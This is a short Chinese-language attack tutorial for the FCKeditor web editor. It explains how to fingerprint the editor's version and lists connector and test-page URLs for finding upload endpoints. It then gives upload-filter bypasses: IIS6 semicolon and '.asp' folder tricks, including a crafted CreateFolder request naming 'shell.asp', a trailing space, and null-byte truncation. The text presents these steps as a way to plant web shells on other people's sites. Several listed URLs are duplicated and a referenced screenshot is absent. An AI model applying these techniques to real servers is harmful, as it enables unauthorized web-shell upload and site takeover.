fckeditor简介

FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。它志于轻量化，不需要太复杂的安装步骤即
可使用。它可和PHP、 JavaScript、ASP、ASP.NET、ColdFusion、Java、以及ABAP等不同的编程语言相结合。

漏洞利用过程

判断当前fck版本

使用方法在含有fckeditor的网址后面加入_whatsnew.html或者editor/dialog/fck_about.html

找上传地址

常用的上传地址有如下几种：
1.FCKeditor/editor/filemanager/browser/default/connectors/test.html

2.FCKeditor/editor/filemanager/browser/default/connectors/test.html

3.FCKeditor/editor/filemanager/connectors/test.html

4.FCKeditor/editor/filemanager/connectors/test.html

5.FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

6.FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

7.FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php

8.FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

如果嫌这样手工找太麻烦也可以使用工具来帮你寻找判断

上传方法

1.fckeditor在2.2版本下：apache和linux环境下可以在上传文件后面加上. 来突破。

2.小于2.4版本的File参数时为黑名单验证，可以通过上传.asa、.cer、.asp;.jpg(针对IIS6)。如果asa、cer不被解析，
  还可以传.asp[空格]。传的方法就是抓包然后在数据包里的文件名后填个空格

3.2.5.x和2.6.x：如果是IIS6.0 ，可以通过突破变”.”为”_”限制创建.asp文件夹，代码如下：
 Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2Fshell.asp&NewFolderName=z.asp
 也可以在上传文件的时候进行抓包，修改包中的路径信息将%2F（/）改为/a.asp就会自动创建一个a.asp的文件夹，然后在文件夹中上传图片。

4.对于php来说可以通过写一个能够对fckeditor提交表单文件的html文件，但应用版本是fck2.4一下方法如下截图。

5.上传两次a.asp;.jpg,来绕过

6.通过将上传的文件改为a.asp%00.txt用00截断的方式来做。